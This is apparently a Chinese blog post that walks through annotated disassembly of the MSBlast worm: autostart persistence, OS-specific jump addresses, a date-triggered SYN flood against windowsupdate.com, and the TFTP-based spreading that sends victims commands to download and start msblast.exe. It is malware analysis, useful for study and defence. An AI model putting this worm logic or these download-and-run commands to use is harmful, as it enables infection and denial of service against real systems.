`
lovnet
  • 浏览: 6920018 次
  • 性别: Icon_minigender_1
  • 来自: 武汉
文章分类
社区版块
存档分类
最新评论

msblast蠕虫主要代码分析

阅读更多

;在注册表中写入自启动项
:00401250 55push ebp
:00401251 89E5mov ebp, esp
:00401253 81ECAC030000sub esp, 000003AC
:00401259 56push esi
:0040125A 57push edi
:0040125B 31F6xor esi, esi
:0040125D 6A00push 00000000
:0040125F 8D45F8lea eax, dword ptr [ebp-08]
:00401262 50push eax
:00401263 6A00push 00000000
:00401265 683F000F00push 000F003F
:0040126A 6A00push 00000000
:0040126C 6A00push 00000000
:0040126E 6A00push 00000000
:00401270 685D484000push 0040485D;db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
:00401275 6802000080push 80000002
:0040127A E80D110000Call 0040238C;ADVAPI32.RegCreateKeyExA
:0040127F 6A32push 00000032
:00401281 683C404000push 0040403C;db 'msblast.exe',0
:00401286 6A01push 00000001
:00401288 6A00push 00000000
:0040128A 6849484000push 00404849;db 'windows auto update',0
:0040128F FF75F8push [ebp-08]
:00401292 E801110000Call 00402398;ADVAPI32.RegSetValueExA
:00401297 FF75F8push [ebp-08]
:0040129A E8E1100000Call 00402380;ADVAPI32.RegCloseKey
;创建互斥体
:0040129F 6843484000push 00404843;db 'BILLY',0
:004012A4 6A01push 00000001
:004012A6 6A00push 00000000
:004012A8 E8A3100000Call 00402350;KERNEL32.CreateMutexA
……………………
;选择发送数据的随机数
:00401476 E8BD0E0000Call 00402338;KERNEL32.GetTickCount
:0040147B 50push eax;用GetTickCount的输出作为srand的随机数种子
:0040147C E8B30F0000Call 00402434;CRTDLL.srand
:00401481 59pop ecx
:00401482 E8890F0000Call 00402410;CRTDLL.rand
:00401487 B914000000mov ecx, 00000014
:0040148C 99cdq
:0040148D F7F9idiv ecx;
:0040148F 83FA0Ccmp edx, 0000000C
:00401492 7D02jge 00401496
:00401494 31F6xor esi, esi
:00401496 C7053431400001000000mov dword ptr [00403134], 00000001
:004014A0 E86B0F0000Call 00402410;CRTDLL.rand
:004014A5 B90A000000mov ecx, 0000000A
:004014AA 99cdq
:004014AB F7F9idiv ecx
:004014AD 83FA07cmp edx, 00000007
:004014B0 7E0Ajle 004014BC
:004014B2 C7053431400002000000mov dword ptr [00403134], 00000002
……………………
:00401954 833D3431400001cmp dword ptr [00403134], 00000001;通过比较这个地址来确定发送针对2000还是XP的攻击代码
:0040195B 750Cjne 00401969
:0040195D C785ECEAFFFF9D130001mov dword ptr [ebp+FFFFEAEC], 0100139D;使用针对Windows XP的跳转地址
:00401967 EB0Ajmp 00401973
:00401969 C785ECEAFFFF9F751800mov dword ptr [ebp+FFFFEAEC], 0018759F;使用针对Windows 2000的跳转地址
……………………
;判断日期
:004014FC 6A03push 00000003;size of buffer
:004014FE 8D45F4lea eax, dword ptr [ebp-0C]
:00401501 50push eax;buffer
:00401502 683C484000push 0040483C;db 'd',0取日期
:00401507 6A00push 00000000
:00401509 6A00push 00000000
:0040150B 6809040000push 00000409;"0409"="en-us;英语 (美国)"
;从GetDateFormatA的Locale参数来看,作者使用的操作系统的区域设置是美国。
:00401510 E8E70D0000Call 004022FC;KERNEL32.GetDateFormatA
:00401515 6A03push 00000003
:00401517 8D45F0lea eax, dword ptr [ebp-10]
:0040151A 50push eax
:0040151B 683A484000push 0040483A;db 'M',0取月份
:00401520 6A00push 00000000
:00401522 6A00push 00000000
:00401524 6809040000push 00000409
:00401529 E8CE0D0000Call 004022FC;KERNEL32.GetDateFormatA
:0040152E 8D45F4lea eax, dword ptr [ebp-0C]
:00401531 50push eax
:00401532 E8790E0000Call 004023B0;CRTDLL.atoi
:00401537 59pop ecx
:00401538 83F80Fcmp eax, 0000000F;比较日期是否大于15日
:0040153B 7F0Fjg 0040154C;日期大于15日则跳到创建DoS线程
:0040153D 8D7DF0lea edi, dword ptr [ebp-10]
:00401540 57push edi
:00401541 E86A0E0000Call 004023B0;CRTDLL.atoi
:00401546 59pop ecx
:00401547 83F808cmp eax, 00000008;比较月份是否大于8月
:0040154A 7E16jle 00401562;月份大于8月则往下执行创建DoS线程
:0040154C 8D45FClea eax, dword ptr [ebp-04]
:0040154F 50push eax
:00401550 6A00push 00000000
:00401552 6A00push 00000000
:00401554 68C11E4000push 00401EC1;DoS子函数
:00401559 6A00push 00000000
:0040155B 6A00push 00000000
:0040155D E8120E0000Call 00402374;KERNEL32.CreateThread
……………………
;处理地址子函数,转换结果保存在eax
:00401E8B 55push ebp
:00401E8C 89E5mov ebp, esp
:00401E8E 56push esi
:00401E8F 57push edi
:00401E90 FF7508push [ebp+08]
:00401E93 E8D8020000Call 00402170;WS2_32.inet_addr
:00401E98 89C7mov edi, eax
:00401E9A 31F6xor esi, esi
:00401E9C 83FFFFcmp edi, FFFFFFFF
:00401E9F 751Ajne 00401EBB;如果是IP地址就直接跳过去,如果不是就先解析域名
:00401EA1 FF7508push [ebp+08]
:00401EA4 E827030000Call 004021D0;WS2_32.gethostbyname
:00401EA9 89C6mov esi, eax
:00401EAB 09F6or esi, esi
:00401EAD 7505jne 00401EB4
:00401EAF 83C8FFor eax, FFFFFFFF
:00401EB2 EB09jmp 00401EBD
:00401EB4 8B460Cmov eax, dword ptr [esi+0C]
:00401EB7 8B00mov eax, dword ptr [eax]
:00401EB9 8B38mov edi, dword ptr [eax]
:00401EBB 89F8mov eax, edi
:00401EBD 5Fpop edi
:00401EBE 5Epop esi
:00401EBF 5Dpop ebp
:00401EC0 C3ret

;DoS子函数
:00401EC1 55push ebp
:00401EC2 89E5mov ebp, esp
:00401EC4 51push ecx
:00401EC5 53push ebx
:00401EC6 56push esi
:00401EC7 57push edi
:00401EC8 C745FC01000000mov [ebp-04], 00000001
:00401ECF 68EC474000push 004047EC;db 'windowsupdate.com',0
:00401ED4 E8B2FFFFFFcall 00401E8B;处理地址子函数
:00401ED9 59pop ecx
:00401EDA 89C6mov esi, eax;esi保存解析出来的IP
:00401EDC 6A01push 00000001
:00401EDE 6A00push 00000000
:00401EE0 6A00push 00000000
:00401EE2 68FF000000push 000000FF
:00401EE7 6A03push 00000003
:00401EE9 6A02push 00000002
:00401EEB E84C030000Call 0040223C;WS2_32.WSASocketA
:00401EF0 89C7mov edi, eax
:00401EF2 83F8FFcmp eax, FFFFFFFF
:00401EF5 7504jne 00401EFB
:00401EF7 31C0xor eax, eax
:00401EF9 EB34jmp 00401F2F
:00401EFB 6A04push 00000004
:00401EFD 8D45FClea eax, dword ptr [ebp-04]
:00401F00 50push eax
:00401F01 6A02push 00000002
:00401F03 6A00push 00000000
:00401F05 57push edi
:00401F06 E8AD020000Call 004021B8;WS2_32.setsockopt
:00401F0B 83F8FFcmp eax, FFFFFFFF
:00401F0E 7504jne 00401F14;成功则跳转
:00401F10 31C0xor eax, eax
:00401F12 EB1Bjmp 00401F2F
:00401F14 57push edi
:00401F15 56push esi
:00401F16 E81B000000call 00401F36;发包函数
:00401F1B 83C408add esp, 00000008
:00401F1E 6A14push 00000014
:00401F20 E837040000Call 0040235C;KERNEL32.Sleep
:00401F25 EBEDjmp 00401F14
:00401F27 57push edi
:00401F28 E8C7020000Call 004021F4;WS2_32.closesocket
:00401F2D 31C0xor eax, eax
:00401F2F 5Fpop edi
:00401F30 5Epop esi
:00401F31 5Bpop ebx
:00401F32 C9leave
:00401F33 C20400ret 0004

;发包函数
:00401F36 55push ebp
:00401F37 89E5mov ebp, esp
:00401F39 81EC9C000000sub esp, 0000009C
:00401F3F 53push ebx
:00401F40 56push esi
:00401F41 57push edi
:00401F42 8D7D9Clea edi, dword ptr [ebp-64]
:00401F45 8D35B0474000lea esi, dword ptr [004047B0]
:00401F4B B90F000000mov ecx, 0000000F
:00401F50 F3repz
:00401F51 A5movsd
:00401F52 66C7857EFFFFFF5000mov word ptr [ebp+FFFFFF7E], 0050
:00401F5B E8D8030000Call 00402338;KERNEL32.GetTickCount
:00401F60 50push eax;GetTickCount的结果作为srand的随机数种子
:00401F61 E8CE040000Call 00402434;CRTDLL.srand
:00401F66 E8A5040000Call 00402410;CRTDLL.rand
:00401F6B 898568FFFFFFmov dword ptr [ebp+FFFFFF68], eax
:00401F71 E89A040000Call 00402410;CRTDLL.rand
:00401F76 B9FF000000mov ecx, 000000FF
:00401F7B 99cdq
:00401F7C F7F9idiv ecx
:00401F7E 52push edx;rand
:00401F7F 8BBD68FFFFFFmov edi, dword ptr [ebp+FFFFFF68]
:00401F85 89F8mov eax, edi
:00401F87 B9FF000000mov ecx, 000000FF
:00401F8C 99cdq
:00401F8D F7F9idiv ecx
:00401F8F 52push edx;rand
:00401F90 FF3538314000push dword ptr [00403138];这两个地址保存的是本机IP的前两字节
:00401F96 FF3514304000push dword ptr [00403014]
;synflood的源IP不是完全随机的,前两个字节是真实的,后两字节随机。
;这可能是考虑到某些网络设备不允许非本网络的IP向外连接
:00401F9C 682B484000push 0040482B;db '%i.%i.%i.%i',0
:00401FA1 8DBD6EFFFFFFlea edi, dword ptr [ebp+FFFFFF6E]
:00401FA7 57push edi;生成的IP
:00401FA8 E87B040000Call 00402428;CRTDLL.sprintf
:00401FAD 8D856EFFFFFFlea eax, dword ptr [ebp+FFFFFF6E]
:00401FB3 50push eax
:00401FB4 E8D2FEFFFFcall 00401E8B;处理地址子函数
:00401FB9 89C3mov ebx, eax;把转换后的IP保存到ebx
;下面开始构造synflood数据包
:00401FBB 66C745800200mov [ebp-80], 0002
:00401FC1 0FB7857EFFFFFFmovzx eax, word ptr [ebp+FFFFFF7E]
:00401FC8 50push eax
;目标端口80
:00401FC9 E88A010000Call 00402158;WS2_32.htons
:00401FCE 89C7mov edi, eax
:00401FD0 66897D82mov word ptr [ebp-7E], di
:00401FD4 8B4508mov eax, dword ptr [ebp+08]
:00401FD7 894584mov dword ptr [ebp-7C], eax
:00401FDA C645EC45mov [ebp-14], 45
:00401FDE 6A28push 00000028
:00401FE0 E873010000Call 00402158;WS2_32.htons
:00401FE5 89C7mov edi, eax
:00401FE7 66897DEEmov word ptr [ebp-12], di
:00401FEB 66C745F00100mov [ebp-10], 0001;ident
:00401FF1 66C745F20000mov [ebp-0E], 0000;Fragment Offset:0
:00401FF7 C645F480mov [ebp-0C], 80;TTL:128
:00401FFB C645F506mov [ebp-0B], 06;Protocol:TCP
:00401FFF 66C745F60000mov [ebp-0A], 0000
:00402005 8B4508mov eax, dword ptr [ebp+08]
:00402008 8945FCmov dword ptr [ebp-04], eax
:0040200B 0FB7857EFFFFFFmovzx eax, word ptr [ebp+FFFFFF7E]
:00402012 50push eax
:00402013 E840010000Call 00402158;WS2_32.htons
:00402018 89C7mov edi, eax
:0040201A 66897DDAmov word ptr [ebp-26], di
:0040201E 8365E000and dword ptr [ebp-20], 00000000
:00402022 C645E450mov [ebp-1C], 50
:00402026 C645E502mov [ebp-1B], 02
:0040202A 6800400000push 00004000;TCP Window:16384
:0040202F E824010000Call 00402158;WS2_32.htons
:00402034 89C7mov edi, eax
:00402036 66897DE6mov word ptr [ebp-1A], di;[ebp-1A]TCP Window:16384
:0040203A 66C745EA0000mov [ebp-16], 0000
:00402040 66C745E80000mov [ebp-18], 0000
:00402046 8B45FCmov eax, dword ptr [ebp-04]
:00402049 894594mov dword ptr [ebp-6C], eax;[ebp-6C]目标IP
:0040204C C6459800mov [ebp-68], 00
:00402050 C6459906mov [ebp-67], 06
:00402054 6A14push 00000014
:00402056 E8FD000000Call 00402158;WS2_32.htons
:0040205B 89C7mov edi, eax
:0040205D 66897D9Amov word ptr [ebp-66], di
:00402061 895DF8mov dword ptr [ebp-08], ebx
:00402064 E8A7030000Call 00402410;CRTDLL.rand
:00402069 B9E8030000mov ecx, 000003E8
:0040206E 99cdq
:0040206F F7F9idiv ecx
:00402071 89D7mov edi, edx
:00402073 81C7E8030000add edi, 000003E8
:00402079 81E7FFFF0000and edi, 0000FFFF
:0040207F 57push edi;随机生成的源端口
:00402080 E8D3000000Call 00402158;WS2_32.htons
:00402085 89C7mov edi, eax
:00402087 66897DD8mov word ptr [ebp-28], di
:0040208B E880030000Call 00402410;CRTDLL.rand
:00402090 898564FFFFFFmov dword ptr [ebp+FFFFFF64], eax
:00402096 E875030000Call 00402410;CRTDLL.rand;随机生成seq number
:0040209B 8BBD64FFFFFFmov edi, dword ptr [ebp+FFFFFF64]
:004020A1 C1E710shl edi, 10
:004020A4 09C7or edi, eax
:004020A6 81E7FFFF0000and edi, 0000FFFF
:004020AC 57push edi
:004020AD E8A6000000Call 00402158;WS2_32.htons
:004020B2 89C7mov edi, eax
:004020B4 81E7FFFF0000and edi, 0000FFFF
:004020BA 897DDCmov dword ptr [ebp-24], edi
:004020BD 895D90mov dword ptr [ebp-70], ebx
:004020C0 6A0Cpush 0000000C
:004020C2 8D4590lea eax, dword ptr [ebp-70]
:004020C5 50push eax
:004020C6 8D459Clea eax, dword ptr [ebp-64]
:004020C9 50push eax
:004020CA E81D030000Call 004023EC;CRTDLL.memcpy
:004020CF 6A14push 00000014
:004020D1 8D45D8lea eax, dword ptr [ebp-28]
:004020D4 50push eax
:004020D5 8D45A8lea eax, dword ptr [ebp-58]
:004020D8 50push eax
:004020D9 E80E030000Call 004023EC;CRTDLL.memcpy
:004020DE 6A20push 00000020
:004020E0 8D459Clea eax, dword ptr [ebp-64]
:004020E3 50push eax
:004020E4 E857FDFFFFcall 00401E40
:004020E9 89C7mov edi, eax
:004020EB 66897DE8mov word ptr [ebp-18], di
:004020EF 6A14push 00000014
:004020F1 8D45EClea eax, dword ptr [ebp-14]
:004020F4 50push eax
:004020F5 8D459Clea eax, dword ptr [ebp-64]
:004020F8 50push eax
:004020F9 E8EE020000Call 004023EC;CRTDLL.memcpy
:004020FE 6A14push 00000014
:00402100 8D45D8lea eax, dword ptr [ebp-28]
:00402103 50push eax
:00402104 8D45B0lea eax, dword ptr [ebp-50];[ebp-50]源端口
:00402107 50push eax
:00402108 E8DF020000Call 004023EC;CRTDLL.memcpy
:0040210D 6A04push 00000004
:0040210F 6A00push 00000000
:00402111 8D45C4lea eax, dword ptr [ebp-3C]
:00402114 50push eax
:00402115 E8DE020000Call 004023F8;CRTDLL.memset
:0040211A 6A28push 00000028
:0040211C 8D459Clea eax, dword ptr [ebp-64]
:0040211F 50push eax
:00402120 E81BFDFFFFcall 00401E40
:00402125 89C7mov edi, eax
:00402127 66897DF6mov word ptr [ebp-0A], di
:0040212B 6A14push 00000014
:0040212D 8D45EClea eax, dword ptr [ebp-14]
:00402130 50push eax
:00402131 8D459Clea eax, dword ptr [ebp-64]
:00402134 50push eax
:00402135 E8B2020000Call 004023EC;CRTDLL.memcpy
:0040213A 83C478add esp, 00000078
:0040213D 6A10push 00000010
:0040213F 8D4580lea eax, dword ptr [ebp-80]
:00402142 50push eax
:00402143 6A00push 00000000
:00402145 6A28push 00000028
:00402147 8D459Clea eax, dword ptr [ebp-64]
:0040214A 50push eax
:0040214B FF750Cpush [ebp+0C]
:0040214E E859000000Call 004021AC;WS2_32.sendto发包
:00402153 5Fpop edi
:00402154 5Epop esi
:00402155 5Bpop ebx
:00402156 C9leave
:00402157 C3ret

………………

;创建tftp服务器函数
:00401576 55push ebp
:00401577 89E5mov ebp, esp
:00401579 81EC2C040000sub esp, 0000042C
:0040157F 53push ebx
:00401580 56push esi
:00401581 57push edi
:00401582 C7053840400001000000mov dword ptr [00404038], 00000001
:0040158C 6A00push 00000000
:0040158E 6A02push 00000002;SOCK_DGRAM使用UDP
:00401590 6A02push 00000002
:00401592 E82D0C0000Call 004021C4;WS2_32.socket
:00401597 A324314000mov dword ptr [00403124], eax
:0040159C 83F8FFcmp eax, FFFFFFFF
:0040159F 0F8445010000je 004016EA
:004015A5 6A10push 00000010
:004015A7 6A00push 00000000
:004015A9 8D85D8FDFFFFlea eax, dword ptr [ebp+FFFFFDD8]
:004015AF 50push eax
:004015B0 E8430E0000Call 004023F8;CRTDLL.memset
:004015B5 83C40Cadd esp, 0000000C
:004015B8 66C785D8FDFFFF0200mov word ptr [ebp+FFFFFDD8], 0002
:004015C1 6A45push 00000045;监听69端口
:004015C3 E8900B0000Call 00402158;WS2_32.htons
:004015C8 89C2mov edx, eax
:004015CA 668995DAFDFFFFmov word ptr [ebp+FFFFFDDA], dx
:004015D1 83A5DCFDFFFF00and dword ptr [ebp+FFFFFDDC], 00000000
:004015D8 6A10push 00000010
:004015DA 8D85D8FDFFFFlea eax, dword ptr [ebp+FFFFFDD8]
:004015E0 50push eax
:004015E1 FF3524314000push dword ptr [00403124]
:004015E7 E8F00B0000Call 004021DC;WS2_32.bind
:004015EC 09C0or eax, eax
:004015EE 0F85F6000000jne 004016EA
:004015F4 C785F8FDFFFF10000000mov dword ptr [ebp+FFFFFDF8], 00000010
:004015FE 8D85F8FDFFFFlea eax, dword ptr [ebp+FFFFFDF8]
:00401604 50push eax
:00401605 8D85E8FDFFFFlea eax, dword ptr [ebp+FFFFFDE8]
:0040160B 50push eax
:0040160C 6A00push 00000000
:0040160E 6804020000push 00000204
:00401613 8D85D4FBFFFFlea eax, dword ptr [ebp+FFFFFBD4]
:00401619 50push eax
:0040161A FF3524314000push dword ptr [00403124]
:00401620 E8630B0000Call 00402188;WS2_32.recvfrom
:00401625 83F801cmp eax, 00000001;如果请求
:00401628 0F8CBC000000jl 004016EA
:0040162E 31DBxor ebx, ebx
:00401630 6837484000push 00404837;db 'rb',0只读、bin模式打开文件
:00401635 6820304000push 00403020;当前文件绝对路径的偏移
:0040163A E8950D0000Call 004023D4;CRTDLL.fopen
;这个蠕虫建立tftp的方式和当年的Nimda是一样的,不管请求的文件名是什么,都返回蠕虫文件。
;所以这个tftp服务器是不会导致系统文件泄露的。和Nimda不同的是,只有成功地攻击了一台机器之后,这个tftp服务器才会运行。
;所以在感染了msblast.exe的系统上没看到监听UDP/69端口是很正常的。

………………

;创建tftp服务器线程,发送tftp命令传送文件及运行
:00401CBD 8D85CCE6FFFFlea eax, dword ptr [ebp+FFFFE6CC]
:00401CC3 50push eax
:00401CC4 6A00push 00000000
:00401CC6 6A00push 00000000
:00401CC8 6876154000push 00401576;创建tftp服务器函数
:00401CCD 6A00push 00000000
:00401CCF 6A00push 00000000
:00401CD1 E89E060000Call 00402374;KERNEL32.CreateThread
:00401CD6 8985C0EDFFFFmov dword ptr [ebp+FFFFEDC0], eax
:00401CDC 6A50push 00000050
:00401CDE E879060000Call 0040235C;KERNEL32.Sleep
:00401CE3 683C404000push 0040403C;db 'msblast.exe',0
:00401CE8 6800304000push 00403000;本机IP
:00401CED 680C484000push 0040480C;db 'tftp -i %s GET %s',0
:00401CF2 8D85FCEDFFFFlea eax, dword ptr [ebp+FFFFEDFC]
:00401CF8 50push eax
:00401CF9 E82A070000Call 00402428;CRTDLL.sprintf
:00401CFE 83C410add esp, 00000010
:00401D01 8D8DFCEDFFFFlea ecx, dword ptr [ebp+FFFFEDFC]
:00401D07 83C8FFor eax, FFFFFFFF
:00401D0A 40inc eax
:00401D0B 803C0100cmp byte ptr [ecx+eax], 00
:00401D0F 75F9jne 00401D0A
:00401D11 6A00push 00000000
:00401D13 50push eax
:00401D14 8D85FCEDFFFFlea eax, dword ptr [ebp+FFFFEDFC]
:00401D1A 50push eax
:00401D1B FFB5F8EDFFFFpush dword ptr [ebp+FFFFEDF8]
:00401D21 E87A040000Call 004021A0;WS2_32.send
:00401D26 83F801cmp eax, 00000001
:00401D29 0F8CBC000000jl 00401DEB
:00401D2F 68E8030000push 000003E8
:00401D34 E823060000Call 0040235C;KERNEL32.Sleep
:00401D39 31DBxor ebx, ebx
:00401D3B EB0Bjmp 00401D48

:00401D3D 68D0070000push 000007D0
:00401D42 E815060000Call 0040235C;KERNEL32.Sleep
:00401D47 43inc ebx

:00401D48 83FB0Acmp ebx, 0000000A
:00401D4B 7D09jge 00401D56
:00401D4D 833D3840400000cmp dword ptr [00404038], 00000000
:00401D54 75E7jne 00401D3D
:00401D56 683C404000push 0040403C;db 'msblast.exe',0
:00401D5B 6802484000push 00404802;db 'start %s',0
:00401D60 8D85FCEDFFFFlea eax, dword ptr [ebp+FFFFEDFC]
:00401D66 50push eax
:00401D67 E8BC060000Call 00402428;CRTDLL.sprintf
:00401D6C 83C40Cadd esp, 0000000C
:00401D6F 8D8DFCEDFFFFlea ecx, dword ptr [ebp+FFFFEDFC]
:00401D75 83C8FFor eax, FFFFFFFF

:00401D78 40inc eax
:00401D79 803C0100cmp byte ptr [ecx+eax], 00
:00401D7D 75F9jne 00401D78
:00401D7F 6A00push 00000000
:00401D81 50push eax
:00401D82 8D85FCEDFFFFlea eax, dword ptr [ebp+FFFFEDFC]
:00401D88 50push eax
:00401D89 FFB5F8EDFFFFpush dword ptr [ebp+FFFFEDF8]
:00401D8F E80C040000Call 004021A0;WS2_32.send
:00401D94 83F801cmp eax, 00000001
:00401D97 7C52jl 00401DEB
:00401D99 68D0070000push 000007D0
:00401D9E E8B9050000Call 0040235C;KERNEL32.Sleep
:00401DA3 683C404000push 0040403C;db 'msblast.exe',0
:00401DA8 68FE474000push 004047FE;db '%s',0
:00401DAD 8D85FCEDFFFFlea eax, dword ptr [ebp+FFFFEDFC]
:00401DB3 50push eax
:00401DB4 E86F060000Call 00402428;CRTDLL.sprintf
:00401DB9 83C40Cadd esp, 0000000C
:00401DBC 8D8DFCEDFFFFlea ecx, dword ptr [ebp+FFFFEDFC]
:00401DC2 83C8FFor eax, FFFFFFFF
:00401DC5 40inc eax
:00401DC6 803C0100cmp byte ptr [ecx+eax], 00
:00401DCA 75F9jne 00401DC5
:00401DCC 6A00push 00000000
:00401DCE 50push eax
:00401DCF 8D85FCEDFFFFlea eax, dword ptr [ebp+FFFFEDFC]
:00401DD5 50push eax
:00401DD6 FFB5F8EDFFFFpush dword ptr [ebp+FFFFEDF8]
:00401DDC E8BF030000Call 004021A0;WS2_32.send
:00401DE1 68D0070000push 000007D0
:00401DE6 E871050000Call 0040235C;KERNEL32.Sleep
:00401DEB 83BDF8EDFFFF00cmp dword ptr [ebp+FFFFEDF8], 00000000
:00401DF2 740Bje 00401DFF
:00401DF4 FFB5F8EDFFFFpush dword ptr [ebp+FFFFEDF8]
:00401DFA E8F5030000Call 004021F4;WS2_32.closesocket
:00401DFF 833D3840400000cmp dword ptr [00404038], 00000000
:00401E06 741Fje 00401E27
:00401E08 6A00push 00000000
:00401E0A FFB5C0EDFFFFpush dword ptr [ebp+FFFFEDC0]
:00401E10 E853050000Call 00402368;KERNEL32.TerminateThread
:00401E15 FF3524314000push dword ptr [00403124]
:00401E1B E8D4030000Call 004021F4;WS2_32.closesocket
:00401E20 83253840400000and dword ptr [00404038], 00000000
:00401E27 83BDC0EDFFFF00cmp dword ptr [ebp+FFFFEDC0], 00000000
:00401E2E 740Bje 00401E3B
:00401E30 FFB5C0EDFFFFpush dword ptr [ebp+FFFFEDC0]
:00401E36 E8F1040000Call 0040232C;KERNEL32.CloseHandle
:00401E3B 5Fpop edi
:00401E3C 5Epop esi
:00401E3D 5Bpop ebx
:00401E3E C9leave
:00401E3F C3ret
;连接到远端后发送命令:
;tftp -i xxx.xxx.xxx.xxx GET msblast.exe
;start msblast.exe
;msblast.exe
;不知道为什么要运行两遍msblast.exe
;tftp下载的文件默认为只读。

从GetDateFormat函数的LCID参数是409来看,作者使用的操作系统的区域设置是美国。

从文件编译时间来看2003年8月11日7点21分。而honeypot上最早捕获的时间是北京时间2003年8月11日14点03分。
如果作者和我们在同一个时区,那么就是6小时后传播到honeypot上的。如果不是,那么作者所在的地方应该在我们的西边不超过6个时区的地方。

分享到:
评论

相关推荐

    冲击波(Worm.Msblast)病毒的最新安全补丁程序

    冲击波(Worm.Msblast)病毒是一种在2003年引起广泛影响的计算机蠕虫,它利用了微软Windows操作系统中的一个特定漏洞进行传播。该病毒主要通过互联网和网络共享进行快速扩散,对系统安全构成严重威胁。微软针对这个...

    “冲击波”病毒(WORM_MSBlast.A) 安全补丁

    遭受该蠕虫感染后可能出现以下现象,Word、Excel、Powerpoint等文件无法正常运行,弹出找不到链接文件的对话框,一些功能如“粘帖”等无法正常使用,控制面板出现异常、系统文件无法正常显示、Windows界面下的功能...

    一键关闭危险服务和常见病毒木马端口.zip

    禁止网上邻居的文件传输;...关闭msblast冲击波蠕虫监听端口;关闭远程控制软件(remote administrator)服务端口;关闭远程控制软件VNC的两个默认服务端口;关闭木马Portal of Doom默认服务端口等等.....

    a63822322的处理冲击波的说明

    冲击波病毒(Blaster Worm),又称为Lovsan,是一种网络蠕虫,主要攻击运行Microsoft Windows操作系统的计算机。它通过利用RPC远程过程调用漏洞在未打补丁的系统上自我复制并传播。此病毒于2003年8月首次出现,并...

    计算机安全保密考试题目.pdf

    例如,msblast.exe是一个特定的网络蠕虫病毒,它是Worm.Blaster的一个实例,该蠕虫利用Windows系统的RPC漏洞进行传播。 Unicode漏洞是与IIS(Internet Information Services)服务器相关的一种安全问题。IIS是微软...

    必须禁用或可以禁用的服务,这样也可以提升系统运行速度!!!!!!!!

    - **禁用理由**:由于其功能被其他软件覆盖,且存在被恶意利用的风险,如MSBlast蠕虫病毒。 ### 4. Terminal Services - **功能描述**:提供远程桌面服务,允许用户远程控制计算机。 - **禁用理由**:如果不需要...

    信息安全技术基础:计算机病毒的防治.pptx

    例如,WORM_MSBLAST.A蠕虫病毒就是一种能够利用系统漏洞进行自我复制并传播的典型例子。 三、感染计算机病毒的特征 当计算机被病毒感染时,可能会出现以下症状: 1. 系统运行异常:速度变慢,频繁死机或重启。 2. ...

    常见病毒、木马进程速查表

    10. 冲击波病毒 - Msblast.exe 冲击波病毒是一种病毒,可以感染计算机系统,使其出现异常行为。 十一、防范病毒和木马的方法 1. 安装杀毒软件,及时更新病毒库。 2. 避免打开来自未知来源的电子邮件附件。 3. 避免...

    1.2因特网的信息交流与网络安全.pdf

    1. msblast.exe:这是一个被普遍认为是恶意软件的文件名,它是一个蠕虫病毒,在2003年广泛传播,攻击运行Windows操作系统的计算机。提及它可能是在讨论如何通过电子邮件附件传播恶意软件,这是网络安全中的一个常见...

    《基于ACL的网络病毒过滤规则》毕业论文

    1.2.1 病毒制造者的心态分析 4 1.2.2 反病毒行动 5 2. ACL的发展,现状,将来 8 2.1 什么是ACL 8 2.1.1 ACL的工作流程及分类 8 2.1.2 ACL应用举例 10 2.2 当前的网络安全技术 10 2.3 ACL的未来 14 3. 基于...

    2021网通公司实践报告.docx

    实习工作主要涉及使用MS-Office软件,特别是Excel,对数据进行整理和修改。虽然这些任务看似基础,但对于计算机专业的我来说,它们提供了深入了解办公软件实际应用的机会,也让我认识到即使是基础技能,也能在工作中...

    网通公司实践汇报材料.docx

    6. 病毒攻击与网络安全:作者见证了MSBlast病毒对系统的影响,强调了网络安全的重要性,包括及时更新服务包、安装补丁和防病毒软件。 7. 团队协作:实习过程中,作者与赵同学共同承担工作,体现了团队合作的价值,...

    Windows XP必须禁止10的服务

    - **禁用理由**:此服务容易被恶意软件利用来传播,例如 MSBlast 和 Slammer 蠕虫病毒。禁用可以有效降低此类风险。 - **操作指南**:在服务列表中查找 Messenger 服务并设置为禁用。 #### 4. Terminal Services - ...

    网通公司社会实践报告.doc

    公司遭受MSBlast病毒攻击的事件给我敲响了警钟,让我认识到及时更新系统补丁和防病毒软件的重要性。网络安全已成为现代信息技术中不可忽视的一环。 除此之外,我还有幸参与了数据库管理与SQL Server的使用,这不仅...

    常见病毒、木马进程速查表 .doc

    4. **Msblast.exe**:这是著名的“冲击波”病毒,通过网络传播,能够自动执行攻击代码,影响网络性能。 5. **Mschv.exe**、**Msgsrv36.exe** 和 **Msstart.exe**:这些都是与恶意活动相关的进程,可能会导致系统不...

    计算机-Windows进程知识-进程列表.docx

    - **msblast.exe**:一种著名的蠕虫病毒。 - **nsupdate.exe**:可能与某些间谍软件相关。 - **optimize.exe**:未知程序,可能涉及优化工具但可能存在风险。 #### 系统进程 这部分列出的是由Windows操作系统启动...

    智能关闭危险端口(bat文件)

    echo 关闭msblast冲击波蠕虫监听端口…………OK! ipseccmd -w REG -p "HFUT_SECU" -r "Block TCP/4899" -f *+0:4899:TCP -n BLOCK -x >nul echo 关闭远程控制软件(remote administrator)服务端口…………OK! ...

    Window XP中哪些服务可以禁止.txt

    - **建议操作**:随着现代通信工具的发展,Messenger的功能已不再必要,且存在被恶意软件利用的风险(如MSBlast病毒),建议禁用此服务。 ### 4. Terminal Services - **功能描述**:支持远程桌面连接,允许用户...

    提高电脑速度,XP可以关闭的服务转载.doc

    2. **Indexing Service**:对于个人用户,如果没有特别的需求,可以关闭,因为它主要用于加快文件访问,但对于大量文件索引不是必需的。 3. **Application Layer Gateway Service**:若未启用Internet连接共享或...

    win2003服务器安全设置之 IP安全策略

    2. **UDP 135-139**: 这些端口主要用于NetBIOS(Network Basic Input/Output System)服务,包括名称解析、文件共享和打印服务。阻止这些端口可以防止恶意用户利用这些服务进行攻击。 3. **UDP 445**: 这个端口用于...

Global site tag (gtag.js) - Google Analytics